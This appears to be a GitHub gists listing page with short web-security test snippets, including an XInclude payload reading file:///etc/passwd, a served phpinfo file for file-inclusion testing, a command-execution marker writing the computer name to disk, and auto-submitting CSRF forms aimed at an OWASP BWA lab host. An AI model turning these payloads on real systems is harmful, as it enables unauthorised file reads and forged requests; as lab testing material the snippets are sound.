This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
console.log("Logged from external JS file"); | |
alert("From external JS file"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$env:computername > C:\Users\Az-administrator\Desktop\from_github.txt |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> | |
<xi:include parse="text" href="file:///etc/passwd"/></foo> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ mkdir evil_files | |
$ cat > evil_files/phpinfo.txt | |
<?php | |
phpinfo(); | |
?> | |
Next, we need to serve the file. Python has a built in web server module we can use for this. | |
$ cd evil_files | |
$ python -m SimpleHTTPServer |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>PHP Test</title> | |
</head> | |
<body> | |
<?php echo '<p>Hello World</p>'; ?> | |
</body> | |
</html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head></head> | |
<body> | |
<h1>Hello world!</h1> | |
</body> | |
<html> | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> | |
<script type="text/javascript">$(document).ready(function (){ | |
setTimeout("$('#target').submit()", 3000); | |
});</script> | |
</head> | |
<body> | |
<h1>Loading...</h1> | |
<!–– Change URL and params below--> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<!–– Change URL and params below--> | |
<form method="POST" action="http://owaspbwa/ghost/blogView.php"> | |
<input type="hidden" name="vuln" value="me so dumb"/> | |
<input type="hidden" name="user" value="admin"/> | |
<input type="submit" value="Submit"> | |
</form> | |
</body> | |
<html> |
NewerOlder